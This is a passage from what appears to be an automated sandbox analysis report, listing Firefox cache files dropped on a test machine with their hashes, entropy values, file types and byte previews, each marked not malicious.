                                                                                                                                                                                  Preview:...........Wmo.6..._!..A...`.Y..N...2,.5+4..l9..e5...wGY~k.mA`..;..sw.]..*.<.....J...J.I...m8........f.n..T.,.$&.].Dn.a...H:.2.\.<.@.O....eS..Lg+w''....\.("(...+h.x......Q.l.o..l7....4D.'eR>.......\.U.[./t{..N...f.......x..: ........:$.............M..{k..V..hr9.$`>....c$.!.......p$;O.p.` ..g:.c....o.i"A.w..q|G...r.....D..yY|..9..l..)..K>.%D...Gz......l.r..3...3E)S`..ecJG..VGz.cz~NQ...!\.>..........Im].y...g.o{.oO|7...9XoS`...w...B.v..hy<"...w...;.P/!.m...`_.'...._.....i..ly&..i......g.|.V....3/..M..w ...Z.|%.J.`.mB!.....+...V.A?...VW.F.aW..1...::0 ...<._JB[..y..@V...0.$.C.....O.=TC....".f.`.....0.a.....D.H......E.(@.u..&....%x.W.&..P....-.e.p...U".%...#..m)J=....?.........]O..=....Z9.B5.....Eq.S&..$.tn.. .iU..QT|e..}..e..u|..z..-7.$i.)..$..f..........#.awk<.z.V(....O...:.`[s(!..k....._a.k.K..!D[..E.0.f.f.Sa..y!.y..........i.o.@s]$.J.tb..rWI....j..+G.~....F.h.|}......U...ShG.=.\FI....=..J?.,`3..jr.......(s.l.z7n.h.../....nu.6.I;...c

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\0C7089E12CF76852C222B45A550B575586B3E01C

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 610468608
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):232738
                                                                                                                                                                                  Entropy (8bit):7.994563830658425
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:6144:/XLSCG0sMMXbw/eULoIapxgJGZNdsHMcM:vN7MLw/NvafEGzCg
                                                                                                                                                                                  MD5:BDFAE4EE80FEB6797E3B07FE566057FA
                                                                                                                                                                                  SHA1:702D50BC212E8233C23A6B63AC13958988868402
                                                                                                                                                                                  SHA-256:A98FED06FE25D50642FB91439A8828CEDAC864A49D766B5A705B3DDEC2E260D3
                                                                                                                                                                                  SHA-512:B08600D6BF0669C5A7319B5C24725F4A0CFB1A4A1AC6D6713CA8E51765FFC1FA2D1290797E1766F1A48BB8C1EF447D0B8FB1F513CC74E893F12190D7B3207B47
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........<ks....W..].T.\......&.:q.Nb;q.d.w.A.F..Y.e.o.....c.U...[b...._.......'.k%..t.....z.N....V;>8w6.Ep.].(...CV2....d4.........Z.(X....X...}..".E..b.O....2...Q...Q.D.0p..E.....&..>.^`..N.'..F.. \...rg.d2.4c...k'...-.`..tC.%../XM.m#....{.<....H.:.B..........D..2.Qd....]..z........7.cx/..9e.7..).>....&.`....V...d-M....E.........b|.B1..m......&Z..t...G3......@Q.X?\K.p-u.*.N.........).dp..z....os.q....F...N.v[.4`.l...t..../%.....\.*..`.m2.n)<{...<^... {#..@....a.^.M~w.'./....~Hp.(`.>.....~..d..n4..M......2AF......j..$I..h......nC.!?IY\..y<@..Q[S.#..n...P.?....>45..1U"..-...^....zC%..Wh......I.....C....R....5.Zw..Z.Bh...9Z......t=<..!<.....H.y..........r.X.U..2...`.e.]"?..Y.f.......FL....q8.;$.'.B.z...x..t6.s...7.....9......6......"._....z..J;{......&x><.r.*K.r^.Or.p.&8.^w.?....Y....%s..<.Fj...<Kc..qLS.....#.. ..[}.4..l.../.$.1f~..G....,H.{jO.zO$I.....!.8X."N..0.<x...M5."...,.wc.._.CMWx.b#....p\.k...PJVH^.to.W.....?.n9......$.s+m

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\0D6AA5AF8BCB1890BC9E34B7B5F4154D80D84FE7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (45939)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):146654
                                                                                                                                                                                  Entropy (8bit):5.3051622680379324
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:YQ5uEi/bA+TnJDpamoObnmodwbwnwmwowd6/yW8RNK+blic1rU6fJGnjkuC6hfM4:rblic1rU6fJGjQ6hkefClYT+Ksc6J8f
                                                                                                                                                                                  MD5:01FF2019E2F6F6219F64DC0598370B11
                                                                                                                                                                                  SHA1:0F3D323CCF7C2323643B16283B711FB9D8C3587F
                                                                                                                                                                                  SHA-256:7A05BED2743BBE7FDE39C5D96AD12BA36004A84C5DE5D4158F7D39454D68421B
                                                                                                                                                                                  SHA-512:47D65A3B6CC7FEE4F2C09BAC17731CF76D15D7A86BC02E13E34F5387ADBA0CE70709B9FD664D4CA1DC2024EEC86CAAEBE1AA97F5B340C230518EB94AFCECA962
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometImageFromIXValueRelayWrapper_sprite.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[],kind:"Fragment",metadata:null,name:"CometImageFromIXValueRelayWrapper_sprite",selections:[{alias:null,args:null,kind:"ScalarField",name:"sprited",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"sprite_map_css_class",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"sprite_css_class",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"preloading_spi",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"w",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"h",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"p",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"sz",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"spi",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"uri",storageKey:null},{alias:null,args:null,kind:"ScalarField",na

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\0EA2E1AC3653A248EDE38E975FF2A4ADDA308244

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):492272
                                                                                                                                                                                  Entropy (8bit):7.997760148010294
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:12288:u8fhrUPE5+8TK1g9M6y5JJtuiA50eHgB2rAnavTQ/:fZrUPE5I1g9M6yyZ0AgYra4s
                                                                                                                                                                                  MD5:DA393E9461C622229FCA32A8C125AA71
                                                                                                                                                                                  SHA1:50ED75D8C343D8BECA9ADC686AECB20AE603D6F1
                                                                                                                                                                                  SHA-256:61638A420404FD70E0BA99FE19578AEAE3AB8E9262D357E2D6AF26623DE3B078
                                                                                                                                                                                  SHA-512:F6031E8A24F42BC2AD359D64EC615B661EEAD1C8AE63B4347A25CB0A943ADB36DE73007F2F0C9BE064995AFA535AAF953A25570383AFDCCFE02D5B44E01A6F98
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK...........V...,.}..........gmpopenh264.dll..|.U.8.I.....`....&l.Vpm.5Sf.N.(.."..YXY.%....V:;.......>....u.-...U....(.E.?*.ES.R..?...{'i...]}.}>._?Mr.....s.3s'....Ng.O0..m..?...z..4~{...w...H.\3{....U?*Y..K..+W.-K......,_i.g.k....NJLL.j0F..y..[?}1..........'.G^.#..^.C..{1.~..>.i..=............>}i.......h..h..t..O..^>w..PY.n.e.>...%Q.3....&H.d9....tqZ..pg3....G@u!.........[.4h....E.w.Y...~_1.^.#!f.+,.au......,._..:&...{N..1..~p..~?..DJ..T.".,.vR....u..P........8D;.,.BOp..........D..'...q*..l...;..6$.........9&.<.bU....dExynP..KK.........7~M.X....?.-Q..*.....zs......>..\...bv...y...s..+zN.Kr.(. .Ee.QRco.8..8.~..o..D.OT.5......O.gC.F.3..E......('..>......2Eu.5]l.t}.`...:j.....IW.u...J.....H.m.R.Tz.....O...*..Q...9..j.c.Uc...U8gD..q.^.3..|..Q.g[..Q6Q.q.....GBg..F[.\...D.C.?:1.}.../.t ..`.....}..........@...8c.G.....o. .......TyK.....sS.S..a.a..LR.0.k,.</;"...L.!WDp.M....8r..S..kq..o.0.m.-..,Z.[...>.G....P~.|.7TR...Ug.7.j......8Q>-.u..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\14FF324BEE8F75081FE9C38BDD3C16ACD05B921B

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):22596
                                                                                                                                                                                  Entropy (8bit):6.266296936537667
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:r9zEfS7jHgkwYJi0QN7VqN4mApqN3Xo70tNo+pwPm082nyFz/6RhRA:roS7jiYi0DApQHkKo+pwPo2W
                                                                                                                                                                                  MD5:A32B8152DA7AB1049AA89E020D8ED3BB
                                                                                                                                                                                  SHA1:564DC5B40A5FF807A12A700F46A8207D45C54B28
                                                                                                                                                                                  SHA-256:F7848DF7EAEDD5B3A1BAAD007500041AE83A4AF24666364D3013396DB44A7478
                                                                                                                                                                                  SHA-512:B4B30609ECDCD43AEABCC57A683BCB04F146A736A3F9C52CFEDBBD3AAB53B063A75A63272FB909BC8FFE9BBFD51FF2B022B76C2FDF273045D503383C49E49C99
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:... ftypM4A ....M4A mp42isom........moov...lmvhd.............D..`.................................................@..................................%trak...\tkhd....................`.................................................@...............mdia... mdhd.............D..`.U......"hdlr........soun.................wminf....smhd...........$dinf....dref............url .......;stbl...gstsd...........Wmp4a.........................D.....3esds........"........@.............................stts...................(stsc...................................tstsz...............................................................{...q...h...d..._..._...W...^...b...U...K........stco...............|....udta....meta......."hdlr........mdirappl.............oilst.....nam....data........cancel....cpil....data.............pgap....data.............tmpo....data.............(.too... data........iTunes 12.3.1.23....----....mean....com.apple.iTunes....name....iTunSMPB....data........ 00000000 00000840 0000

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\155D2263DDB83A6BBF57D0E11BDF29E356402E2A

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 738656256
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12750
                                                                                                                                                                                  Entropy (8bit):6.705524600467346
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:XQmNNYQjfqzomzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDxECvDxC:HB0zSWvoI8zSWvoIBHJmvOO
                                                                                                                                                                                  MD5:A7B435B8D6699BA47DEF971F0E113D27
                                                                                                                                                                                  SHA1:6C112183CBD6A0028BC1DE63E9961CCB8EF13704
                                                                                                                                                                                  SHA-256:E40F6665BC17AC7C719B6BB23325EDC8009A604C78960FF3D2E9DD62A8A0B2B0
                                                                                                                                                                                  SHA-512:6031DE3FAB3DDC180CA74BE3392861362308952CFB686CFA92709E5AB1DCAD5B610606A2AA7665683D7B1E0E4B15C4A609721BF25A42A87EBBBF1014809FB5A1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........WmO.:...(.Ug.......!Z.`..c0^.".q.4)N..u....NJ.......y}.K.<..4.!.,..ya.f,..i.,....,..B..d...fy.....0.........b..(..8O.8K/.a|._..oO..\....1..$F.^|g.5.. ...]..k... .Nb..<......7V..D.K../<zD9.....!...=.H.g.I$.3W...Zt...S.dI6......Rd..[.in......Dj."T..|..rn..m..X.Z..z...L....5.T..f/E.=.y'P......F.....Q..u%..z......0....7M.....a..........%r..e....=(3H$R......F#.....760.... .M..L.^wt....D+..d6B.+.=z.`v;...GseR..cG..!....=QO8..4....>./*..n..YJ.w[....Q{......&;Q..F.|.@.TA.d..S.......hd/..W.....>\........I...l..JEjTpX8kM..,c...H...w.q...&....M...A..N..sV.:8......D....x.}.a*.0L3!5..v.B]..........n...M...Qz..E..<....*..../....y.....E.....c.~/!...+F....:..z.AZ..8..I6I.U.....4.Y.......*..iP...+...`:..Rj.4Pg...j.. ....j(.....m.w.t.0..r...phC..'.i.C..$..x......y...jRuWP.o.....n..d.......\Q.<:.*.^.p....E......o..@......[d..Q....1....u.|T....8. c.)s%9..!.........h{.RR....O..j_x..p....jg.3..g{..`%.lN.T?.U.[.nU...D...`....0.$....P0.m..gx.....+f..\..6

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\15F320D20636A4D0A5481D2EF54EE0B2900C6A1A

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20662
                                                                                                                                                                                  Entropy (8bit):5.8118682849907595
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:pRLD5B9hAWv7+swreLYGBRohB1r1uk/KiFTaIda5r:pdD5B3LvyZre8GvIDuuKOa8e
                                                                                                                                                                                  MD5:099EE555B56A9CA21069BCCF09903AF8
                                                                                                                                                                                  SHA1:7465B4CEFC5F0476C293CE5138D7E593F7B2E652
                                                                                                                                                                                  SHA-256:9744454E200D10E0545C00902A82FECC7528594A11258279B78BB4864C179FBA
                                                                                                                                                                                  SHA-512:F8D9479BC4CEEF8A704DFCF6F9950B2E900B46FBF0E67D8B4C218E60F0296CCB59F0A8123E2208CA0B813E8AC8C65A9B42D0FC94745EB49A36BE185510A662D0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","properties":{"id":{"type":"string","title":"Id","description":"A string that will be used to identify a browser (e.g. chrome, firefox_android, \u2026), not tied to a specific name"},"name":{"type":"string","title":"Name","description":"The name of the browser (e.g. Chrome, Firefox for Android, \u2026)"},"status":{"type":"string","title":"Status","description":"Extra information on the version (e.g. current, nightly, esr, \u2026)"},"version":{"type":"string","title":"Version","description":"The version of the browser (e.g. 99, 15.1, \u2026)"}}},"signature":{"ref":"3gx3xzg5klhufc0jzz1s3v0sf","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-04-09-14-36-39.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"BL80tzj7f4km9Rfn8Dl4JzGx4un44CU0V-XuIM2bMIT9V1iQQ2ln5GSXOz5Fj4TtoKjmLDBH8pHu2T8kgC5HBjhpRKjYvX3NBbhcOA_wS9RrVAcZsGt7rkDuI3lFDSWL","signer_id":"remote-settings","public_key

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\16875A0A5E7FD348164124E909EED0EDA6DEE08D

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 268632064
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11654
                                                                                                                                                                                  Entropy (8bit):6.4405225602617096
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:oryU9rYUun89q4WOYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvO:oryXU4uqltmzwTWvoglJmzwTWvogrBHZ
                                                                                                                                                                                  MD5:B955F03063B1909399C40CD5E11AD073
                                                                                                                                                                                  SHA1:797D3D3535B2FAF4E2E10E621DD887EDC332C5F2
                                                                                                                                                                                  SHA-256:ACAA812AB5C07237B941D9A99F1DB3B0D9CEF53F566050337DF43DFB77D64608
                                                                                                                                                                                  SHA-512:78A66FD444CA98E500B10F5E7488174F585BE5343CE47B3F28032C1DE5FD2105589280C7E0C29A163CD134AB9D5D26566906E04113FD891102FB35E43ECBD1B4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........T.n.6..... ..j..6X`.%..K....,...I.eI..x..w/(.j....Kw....S.mt.X.K..v.7.......JYmK.|....2..w...{....6.J"...M..KU...xd..~$`E....."....).R......p..^I.Y.([.4.......y......N.NO....4..M.|.,c.)..-[#.=.<......N.#...'=!......c.(M.f....p...^....M......uUJ.p.].GX_...m...<...#....l...+..P..\./.{.c..:z.+.K0X.jM..V[..;..v........@..&9.n..N..A.Y8....yv...s...f..m..... .(Z........{.x..$..7.@Z}.-*......0._.dy..RO.91..pIc..'.>.'....z.......of..).C.Y..l.f&`..s.....}...cn...../.......\.Ji..,.............H$mi...&!....h. k..c.*S:..]w..7.}.....%y...E......J......l,.RW.@.Eg.54..y~.7.Q...m.vi.].c..F....q..k..j<~....!.....?..1b..%..?j.<.+..~<.!&1.2$.W...(.H...`.:...q..|~ ...-.y.p.~D.z..$.LQG........|Df..?4'..'^..m.......a.../...[....~...B..............,.<...........e...e...F.A.g..V...T....O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\1FBDC76BAC2031D7DFF58235F5C3EAD5E35DDB88

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):62882
                                                                                                                                                                                  Entropy (8bit):5.703371985751408
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:ETsMRensj20tJ9Z5Q6K3uwSXiRc0Pj+P3fPCz3s6cGEIga8hd5t9d5tx:ETcnsjDJtQ6K3urNajcfPCz3s6J8hvj
                                                                                                                                                                                  MD5:437F2A0482999DCC2B474C752FC769D6
                                                                                                                                                                                  SHA1:6DEE256F7C9801035EF9A0889F63D9A9744FDD67
                                                                                                                                                                                  SHA-256:7F41B0CC26D160C3D6EBDBF6F8FB8C865DD0C8B54C019675AB3BA6D1764BD4A3
                                                                                                                                                                                  SHA-512:970C5A8E6CDA9D1D7BAA8245E2517442D98B944A934FB1F57F8C18C4862195BF2F517E9382B2C7B17A532293615874541DF70D09602447E510478433688211C5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("useCometTextDirection",["UnicodeBidi","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=(h||d("react")).useMemo,j={LTR:"ltr",NEUTRAL:"auto",RTL:"rtl"};function a(a,b){return i(function(){var c=d("UnicodeBidi").getDirection(a,b);return j[c]},[b,a])}g["default"]=a}),98);.__d("CometRoundedTextInput.react",["BaseFocusRing.react","BaseTextInput.react","CometScreenReaderText.react","Locale","react","stylex","useBaseInputValidators"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||(i=d("react"));b=i;var k=b.useId,l=b.useState,m={backgroundPlaceholder:{backgroundColor:"xmjcpbm",$$css:!0},backgroundSecondary:{backgroundColor:"x1qhmfi1",$$css:!0},disabledInput:{color:"x1dntmbh",cursor:"x1h6gzvc",$$css:!0},endIcon:{paddingEnd:"xsyo7zv",paddingLeft:null,paddingRight:null,$$css:!0},fontPlaceholder:{color:"x12scifz","::placeholder_color":"x2s2ed0",":focus::placeholder_color":"xq33zhf",$$css:!0},fontSecondary:{color:"xi81zsa",$$css:!0},hideIconAnimation:{transitionDura

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\2342C9A04E8FF594E807328A854C4D2B118D3A52

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):41322
                                                                                                                                                                                  Entropy (8bit):5.897515751096647
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:HVnPBh55zf2l2Yv5F23s6cGEIga8td5tJpd5tJb:HVnZ/5ql2S5F23s6J8tHpHb
                                                                                                                                                                                  MD5:4173F15DE2BE3627AFD3D4944149DA41
                                                                                                                                                                                  SHA1:848D5815FCE04E9C29E900F1EE457EF5FCFB9405
                                                                                                                                                                                  SHA-256:FEB48F8ABC0D381BBA27C9549D79E126FE261DD074DBFE91830E48F393AD6D3F
                                                                                                                                                                                  SHA-512:8FFA4E428CCABB4C0ECCD67A4FB6DD002E11C681D5DE04722FE603BD2B22FD4ED785344D1CC8F8600DF34EC46D12CC18A001693F0816402A0DEC3DB581404C2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometContextualLayer.react",["BaseContextualLayer.react","react","useCometVisualChangeTracker","useMergeRefs"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a,b){var d=c("useCometVisualChangeTracker")();b=c("useMergeRefs")(b,d);return i.jsx(c("BaseContextualLayer.react"),babelHelpers["extends"]({},a,{ref:b}))}a.displayName=a.name+" [from "+f.id+"]";b=i.forwardRef(a);g["default"]=b}),98);.__d("CometTypeaheadProgressGlimmer.react",["CometProgressRingIndeterminate.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(){return i.jsx("div",{className:"x6s0dn4 x78zum5 x1iyjqo2 xdd8jsf xl56j7k",children:i.jsx(c("CometProgressRingIndeterminate.react"),{color:"disabled",size:24})})}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("CometTypeaheadViewItem.react",["CometPressable.react","CometRow.react","CometRowItem.react","emptyFunction","react","stylex"],(function(a,b,c,d,e,f,g){"use strict";var h

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\254256B27E0C48CF9B80B695F0B3B8CA84610495

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8402
                                                                                                                                                                                  Entropy (8bit):6.097488078079186
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:v+eyheEVGq8BRwtkQpSCSkrJAy/Gk/KimiHfbaI8j3qOcdBf5dByr:v+eLYGBRohX1r1uk/KiFTaIdLBLByr
                                                                                                                                                                                  MD5:21AFCF326090D3E88CE403DF7F233B56
                                                                                                                                                                                  SHA1:09730092670DC9CFE0043E832DEB184735752E61
                                                                                                                                                                                  SHA-256:71D301F51FDE5E46673C48742607EC49E95A5A27B89D76CB0F040BB1F3E2D11F
                                                                                                                                                                                  SHA-512:4D71896324B26B682FFC88BE610DF9941C8A033ACD8198C8731C5C7B26666115D299233F801CAB5082C309CF7DB07B208CC7447CE53F60D183B9EB288B08AD6E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"attachment":{"hash":"0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0","size":7581,"filename":"asrouter.ftl","location":"main-workspace/ms-language-packs/4f1bcaa0-ddf9-43ef-aca3-8378c4d05582.ftl","mimetype":"application/octet-stream"},"id":"cfr-v1-en-US","last_modified":1648230346554}}7q............e...e...F.+.e.....q....:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAXxMIIF7TCCA9WgAwIBAgISA9GY462VxzkuNQVlgf2vQY7vMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzEqMCgGA1UECgwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMSowKAYDVQQDDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQwHhcNMjQwMjIwMTEzMDM4WhcNMjUwMjE5MTEzMDM4WjAmMSQwIgYDVQQDExtyZW1vdGUtc2V0dGl

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\2AE1B73416F575D1AC043D10D9DC0983E5DB7B0A

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3642754048
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):286734
                                                                                                                                                                                  Entropy (8bit):7.991493996495767
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:6144:yEFlXQh/9+k8qPkLJWpwwtZCZrjU2Ez+sxlz8rV+UqJ4XHsSv:yclAh/syk9WyfLYz85H3sm
                                                                                                                                                                                  MD5:AB5247A067B99BCCE8F899C046B0C3C9
                                                                                                                                                                                  SHA1:6FB9C125DF4ED632239E18BFAC37D4C0C4C30157
                                                                                                                                                                                  SHA-256:ACBB05F31E3448006129C1DA9DB33E8A18A8C94CD0CA5414FAC995F1EF2FFF06
                                                                                                                                                                                  SHA-512:B05B3731A1EFB94494C02A7B8503BB9972D2DBD08D96D40C23AECE88EDB7DDF92599F2E00AE5A383260F7E687BDF7EA7A23429301CA90E75C3053C50FF8E47C3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........Z.n.:.~.h.*..vD...o..\....d...M~...#.C..B....R...o-......$2WR..e.Fqv..\&o..%FAB0...-S.P.\...<.z .p..(a.7"N@X..?....z.!T,y...,...H.),.[..1..x.E.t...Z..K.H..Y.q]XH.........'..ez.u.l..ox.W...h...aC9.).).....nO. ...9....9.KH.......V.eG.j.S.......?..@VWZV.a.g.G.9..........E)b!...V..N..cKy....:a..+.K.O.H.u.....^_.t5.D.@;......f.by0.[.h..Om @....f.9...O.<x.S.o.....8Ge.....0...;...[LS..o...W...-..X...{..(..9..8....JC....wB..f..h....s.G......C...D...[.S..p~....U..NP..b.....!Z.t..(.K.e....G.Q...].7!..S.}/u.K...=.....~.z<.."....-..w....!..........f;..;.@F.RL..d...u1.i...'.;w#...y.`Pl8...S.FrL...TV..c|Ri-\bTM.r..."..%.X.D...........KP....z{.E.Z.1.wH.L.........R.eQ..X......\K+..../....i.0..V....b.KCN..B.....!O...^.h...$x.K..W..$X.$.....r.......|c.(.9..u...1.>..$.K.B..9.@.!.D1.D._..Q..}y*.z.r.'$.(i.......:...jv.&. T...D'5...`t....0...u..A2..{....../i.v...M.....O..D...p.=..l.Mk.........I..^..<....Q aJ..).d...2.r.....HI].D................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\2B532F3C7843FF34725F7B4D5E48AD535F6ACE66

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2877816832
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45831
                                                                                                                                                                                  Entropy (8bit):7.890892157917209
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:mpuVaVxaLp/E/f+W9SRK4DkzDX/rtlkYNzz4IlBU+VytdCrhXxh9zSFHpA22r7zd:mpuVaVxaLp/Sf+W9KgnJ13HWor3mDEGE
                                                                                                                                                                                  MD5:08F00E463031F53D133248A6F21D597A
                                                                                                                                                                                  SHA1:972B44D4C79E277D4AC0348C5B2CB79FA5B1EC06
                                                                                                                                                                                  SHA-256:D9001067DEEAD5EA1CE2FAE26B71984EF1938D43AD1D09DBBE8CE0B734A1FA0A
                                                                                                                                                                                  SHA-512:30F23B9B88AF69B21F0F928F5B6278DDF70E0C178D6D50CB488B4F8C9EE41DBD4CD2D6FEA745EAC1686FD8571AF8C05B4A9A16A86ADD11F9D7F6AB65BF197D64
                                                                                                                                                                                  Malicious:false
